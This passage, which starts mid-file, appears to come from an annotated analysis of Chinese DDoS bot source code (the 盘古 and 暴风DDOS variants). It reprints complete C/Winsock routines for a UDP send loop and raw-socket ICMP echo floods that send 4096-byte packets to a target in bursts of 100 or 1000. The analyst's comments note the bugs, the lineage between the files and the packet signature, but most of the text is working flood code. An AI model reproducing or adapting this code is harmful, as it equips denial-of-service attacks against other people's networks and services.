    ICMPHeader packet;                                      // uninitialised stack struct (see InitICMPPacket)
    InitICMPPacket(&packet);
    while(p->isAttacking)
    {
        sendto(att_sock,(char *)&packet,sizeof(ICMPHeader),0,(sockaddr *)&att_addr,sizeof(SOCKADDR_IN));   // 24-byte UDP datagram; result ignored
        //Sleep(1000);                                      // throttle left disabled: tight loop
    }
    return 0;                                               // att_sock never closed
}

//======================= ==========================

盘古1.5代码.h

//这里我们可以看到和 暴风DDOS.h 是一样的所以我们不介绍了

//暴风DDOS(前几个版本) 的攻击模块是使用盘古的

/////////////ICMP 攻击

/*ICMP Header*/

/*
 * 盘古1.5 copy of the 12-byte ICMP echo "header" (8-byte RFC 792 echo header
 * plus a 4-byte timestamp that is really payload).  Same layout as the earlier
 * copies; 暴风DDOS.h was lifted from this file (see the analyst's note above).
 */
typedef struct _icmphdr
{
    BYTE i_type;       // ICMP type; ICMP_ECHO (8)
    BYTE i_code;       // ICMP code; 0
    USHORT i_cksum;    // checksum over the whole MAX_PACKET buffer
    USHORT i_id;       // echo identifier; the bot's process id
    USHORT i_seq;      // echo sequence number, bumped once per burst
    ULONG timestamp;   // GetTickCount() when the burst was built
}ICMP_HEADER;

#define ICMP_ECHO 8        // ICMP type 8 = echo request (RFC 792)
#define MAX_PACKET 4096    // bytes per flood packet; above a 1500-byte Ethernet MTU, so it is IP-fragmented on the wire

/*
 * RFC 1071 Internet checksum: one's-complement sum of 16-bit words (read in
 * host byte order), with a trailing odd byte added as-is, folded to 16 bits
 * and complemented.  The flood loops run it over the whole MAX_PACKET buffer.
 *
 * buffer: start of the data; must be suitably aligned for USHORT reads.
 * size:   length in bytes; may be odd.
 * Returns the value to store in ICMP_HEADER.i_cksum (that field must be 0
 * while the sum is taken).
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long sum = 0;
    const USHORT *word = buffer;
    int remaining = size;
    for (; remaining > 1; remaining -= sizeof(USHORT))
        sum += *word++;
    if (remaining)
        sum += *(const UCHAR*)word;       /* odd trailing byte */
    /* fold the carries back into the low 16 bits (two steps cover all cases) */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += sum >> 16;
    return (USHORT)(~sum);
}

/*
 * Write an ICMP echo-request header at the start of icmp_data and append the
 * global payload string icmpBuffer after it (same code as the earlier copies).
 *
 * icmp_data: caller-allocated MAX_PACKET-byte buffer.
 * datasize:  never read -- the memcpy is bounded only by strlen(icmpBuffer).
 * Leaves i_cksum at 0 for icmp_flood to compute with checksum() above.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
    ICMP_HEADER *icmp_hdr;
    char *datapart;
    icmp_hdr = (ICMP_HEADER*)icmp_data;
    icmp_hdr->i_type = ICMP_ECHO;                      // echo request
    icmp_hdr->i_code = 0;
    icmp_hdr->i_id = (USHORT)GetCurrentProcessId();    // low 16 bits of the PID
    icmp_hdr->i_cksum = 0;
    icmp_hdr->i_seq = 0;
    datapart = icmp_data + sizeof(ICMP_HEADER);
    memcpy(datapart,icmpBuffer,strlen(icmpBuffer));    // unbounded copy of the payload string
}

/*
 * Thread procedure: ICMP echo-request flood against the global tgtIP until
 * the global StopFlag equals 1.  Byte-for-byte the same routine as
 * 暴风DDOS.h above: 2 s start-up delay, raw ICMP socket with 2 s send
 * timeout, dotted-quad-then-gethostbyname() target resolution, one 4096-byte
 * packet rebuilt per iteration and sent 100 times back to back, Sleep(5).
 *
 * Same defects: datasize and sleep_time unused; WSAStartup()/HeapAlloc()/
 * sendto() results ignored; socket and heap buffer never released; the return
 * after the loop is unreachable.  Started through an LPTHREAD_START_ROUTINE
 * cast even though it returns void.
 */
void icmp_flood()
{
    Sleep(2000);             // 2 s start-up delay before any traffic
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);   // result ignored
    SOCKET m_hSocket;
    SOCKADDR_IN m_addrDest;
    char *icmp_data;
    int datasize = 32;       // dead value: packets are always MAX_PACKET bytes
    int timeout = 2000;      // SO_SNDTIMEO in milliseconds
    m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);   // raw socket: needs admin on modern Windows
    if (m_hSocket == INVALID_SOCKET)
        return;
    if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
        return;              // socket leaks on this path
    memset(&m_addrDest, 0, sizeof(m_addrDest));
    m_addrDest.sin_family = AF_INET;
    if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
    {   // not a dotted quad: treat tgtIP as a hostname
        struct hostent *hp = NULL;
        if ((hp = gethostbyname(tgtIP)) != NULL)
        {
            memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);   // first address in the answer (h_length bytes)
            m_addrDest.sin_family = hp->h_addrtype;                       // address family reported by the resolver
        }
        else
            return;          // unresolvable target: thread exits, socket leaked
    }
    datasize += sizeof(ICMP_HEADER);   // dead store
    icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);   // never freed; NULL not checked
    memset(icmp_data,0,MAX_PACKET);
    fill_icmp_data(icmp_data,MAX_PACKET);
    int seq_no=0;
    int sleep_time = SleepTime/10;     // derived from a global but never used
    while(1)
    {
        if (StopFlag == 1)             // StopFlag == 1 means "not attacking": exit the thread
        {
            ExitThread(0);
            return;
        }
        ((ICMP_HEADER*)icmp_data)->i_cksum = 0;          // must be 0 while summing
        ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;     // never wrapped; truncated to 16 bits on store
        ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
        ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
        // 100 identical packets back to back, then a 5 ms pause
        for (int i=0;i<100;i++)
            sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));   // result ignored
        Sleep(5);
    }
    return;                  // unreachable
}

/////////////////ICMP攻击结束

//================== ===============================

盘古DDOS优化版.h

/*
 * 盘古DDOS优化版 copy of the 12-byte ICMP echo "header" (8-byte RFC 792 echo
 * header plus a 4-byte timestamp that is really payload).  Same layout as the
 * earlier copies on this page.
 */
typedef struct _icmphdr
{
    BYTE i_type;       // ICMP type; ICMP_ECHO (8)
    BYTE i_code;       // ICMP code; 0
    USHORT i_cksum;    // checksum over the whole MAX_PACKET buffer
    USHORT i_id;       // echo identifier; the bot's process id
    USHORT i_seq;      // echo sequence number, bumped once per burst of 1000 packets
    ULONG timestamp;   // GetTickCount() when the burst was built
}ICMP_HEADER;

#define ICMP_ECHO 8        // ICMP type 8 = echo request (RFC 792)
#define MAX_PACKET 4096    // bytes per flood packet; above a 1500-byte Ethernet MTU, so it is IP-fragmented on the wire

/*
 * Standard Internet checksum (RFC 1071) as used by the ICMP flood loop:
 * add up the buffer as 16-bit words in host order, add a dangling last byte
 * if the length is odd, fold the 32-bit accumulator down to 16 bits and
 * return its one's complement.
 *
 * buffer: data to sum, read as USHORTs (alignment is the caller's problem).
 * size:   byte count; odd values are handled.
 * Returns the checksum to be stored in the ICMP header, whose checksum field
 * must already be 0 when this is called.
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long acc = 0;
    USHORT *cur = buffer;
    int left = size;
    while (left > 1) {
        acc += *cur;
        cur++;
        left -= sizeof(USHORT);
    }
    if (left != 0)
        acc += *(UCHAR*)cur;             /* leftover byte */
    while (acc >> 16)                    /* fold until no carry remains */
        acc = (acc & 0xffff) + (acc >> 16);
    return (USHORT)(~acc);
}

///ICMP

/* Payload appended after the 12-byte ICMP_HEADER by fill_icmp_data (copied
 * with strlen(), so only the bytes before the NUL go out).  The literal is five
 * CJK characters; its byte length depends on the source encoding (10 bytes in
 * GBK, 15 in UTF-8), and it makes a convenient packet signature.  Being well
 * under MAX_PACKET-12 bytes, it cannot overflow fill_icmp_data's unbounded
 * memcpy. */
char icmpBuffer[256]="啊啊啊啊啊";

/*
 * Write an ICMP echo-request header at the start of icmp_data and append the
 * global icmpBuffer string (declared just above) after it.  Same code as the
 * earlier copies on this page.
 *
 * icmp_data: caller-allocated MAX_PACKET-byte buffer.
 * datasize:  never read -- the memcpy is bounded only by strlen(icmpBuffer),
 *            which for the 256-byte array above is safe.
 * Leaves i_cksum at 0 for icmpflood to compute.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
    ICMP_HEADER *icmp_hdr;
    char *datapart;
    icmp_hdr = (ICMP_HEADER*)icmp_data;
    icmp_hdr->i_type = ICMP_ECHO;                      // echo request
    icmp_hdr->i_code = 0;
    icmp_hdr->i_id = (USHORT)GetCurrentProcessId();    // low 16 bits of the PID
    icmp_hdr->i_cksum = 0;
    icmp_hdr->i_seq = 0;
    datapart = icmp_data + sizeof(ICMP_HEADER);
    memcpy(datapart,icmpBuffer,strlen(icmpBuffer));    // copy the payload string (no NUL)
}

/*
 * Thread procedure: ICMP echo-request flood against the global tgtip until the
 * global Stop equals 1.  Same structure as 盘古1.5代码.h / 暴风DDOS.h with three
 * changes: no 2 s start-up delay, 1000 back-to-back sends per iteration instead
 * of 100, and Sleep(20) instead of Sleep(5) -- so each thread emits a burst of
 * 1000 identical 4096-byte packets (same seq/timestamp/checksum) every ~20 ms
 * plus send time.
 *
 * Same defects as the originals: datasize unused; WSAStartup()/HeapAlloc()/
 * sendto() results ignored; socket and heap buffer never released; seq_no is
 * never wrapped (truncated to 16 bits on store); the final return is
 * unreachable.
 */
void icmpflood()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);   // result ignored
    SOCKET m_hSocket;
    SOCKADDR_IN m_addrDest;
    char *icmp_data;
    int datasize = 32;       // dead value: packets are always MAX_PACKET bytes
    int timeout = 2000;      // SO_SNDTIMEO in milliseconds
    m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);   // raw socket: needs admin on modern Windows
    if (m_hSocket == INVALID_SOCKET)
        return;
    if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
        return;              // socket leaks on this path
    memset(&m_addrDest, 0, sizeof(m_addrDest));
    m_addrDest.sin_family = AF_INET;
    if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtip)) == INADDR_NONE)
    {   // not a dotted quad: treat tgtip as a hostname
        struct hostent *hp = NULL;
        if ((hp = gethostbyname(tgtip)) != NULL)
        {
            memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);   // first address in the answer
            m_addrDest.sin_family = hp->h_addrtype;
        }
        else
            return;          // unresolvable target: thread exits, socket leaked
    }
    datasize += sizeof(ICMP_HEADER);   // dead store
    icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);   // never freed; NULL not checked
    memset(icmp_data,0,MAX_PACKET);    // redundant with HEAP_ZERO_MEMORY
    fill_icmp_data(icmp_data,MAX_PACKET);
    int seq_no=0;
    while(1)
    {
        if (Stop == 1)                 // controller asked us to stop
        {
            ExitThread(0);
            return;
        }
        ((ICMP_HEADER*)icmp_data)->i_cksum = 0;          // must be 0 while summing
        ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;     // never wrapped; truncated to 16 bits on store
        ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
        ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
        // 1000 identical packets back to back, then a 20 ms pause
        for (int i=0;i<1000;i++)
            sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));   // result ignored
        Sleep(20);
    }
    return;                  // unreachable
}

//===================================================== ===